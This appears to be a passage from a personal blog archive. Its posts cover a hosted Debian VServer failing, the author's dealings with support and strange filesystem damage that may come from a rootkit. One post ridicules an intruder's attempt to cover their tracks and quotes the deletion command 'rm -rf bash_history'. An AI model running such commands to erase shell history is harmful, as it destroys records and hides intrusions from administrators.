More than two weeks ago I blogged about my server being down. After multiple emails, phone calls, and even a fax trying to reach the support team, the server is still dead. But at least I know (a little bit) more now.
I managed to get someone from support on the phone and he fixed the system at least so far that I could ssh to it again. I was able to pull a complete backup of the system, including a database dump.
That means that Unmaintained Free Software and all other sites hosted on the server will eventually return, no data will be lost.
After I created the backup, I wanted to reinstall the whole system and then install the backup to restore all services. As it turned out, the (automatic) reboot- and reinstall-script they use is obviously broken, I cannot reach the server anymore after I initated the reinstall. This is probably something more serious, as other people seem to be affected, too.
I have not the slightest idea what the hell happened on the server. There was something really, really strange going on. An example:
# ls -l /usr/bin/traceroute
-rw-rw---- 1 mysql mysql 310872 Jun 21 03:21 traceroute
Why the hell is
traceroute not executable and belongs to user/group
mysql? There are several other anomalies there:
/usr/share/doc/apt is not a directory as it is supposed to be, but a Perl script.
/usr/bin/id is a directory. Multiple system tools (awk, sed, ...) are not executable and partly directories with strange stuff in them. What gives?
One possible explanation is that the server was hacked and some rootkit wrecked havoc on the server. After a quick glance at the logs, I couldn't find any hints for a successful breakin, though. Another possibility is that the hard drive simply died and/or the filesystem was (heavily) corrupted. I don't know...
Has anybody ever seen something like this? Please enlighten me what could have happened...
Somebody got hacked by a complete fool without any sort of clue. What the attacker (i.e. script kiddie) tried to do (and how he failed) is actually quite funny IMHO.
E.g., after trying
rm -rf bash_history
(notice the missing dot in the filename) he wanted to be really sure and issued
Surely, his tracks are perfectly covered now. Nobody will ever know.
(via EDV - Ende Der Vernunft)
Two very handy scripts for your Debian boxes:
Both tools are very useful and can save your ass. Use them.
My Unmaintained Free Software wiki is down since yesterday. I don't know what happened, but I cannot ssh into the VServer where I host the site anymore. The server also hosts Holsham Traders, which is down, too (the SourceForge project page still works, fortunately).
Of course I stupidly neglected regular backups long enough, so that this could turn out to be a major problem...
I asked the hoster of the VServer what the problem is and what I can do to get my sites running again. The answer: "Reinstall the server". Upon reading that, I didn't know whether to laugh, cry, or simply terminate my contract with them immediately.
I mean - come on - that's a fucking Debian box running there, not some not so stable operating system, which needs regular reinstalls.
I basically told them so in another email and asked them to at least send me tarballs of /var/www and other relevant directories plus a dump of the MySQL database. No answer so far.
I'm really curious how this will all end — if one of their disks crashed or their servers burnt down or something, I'm screwed.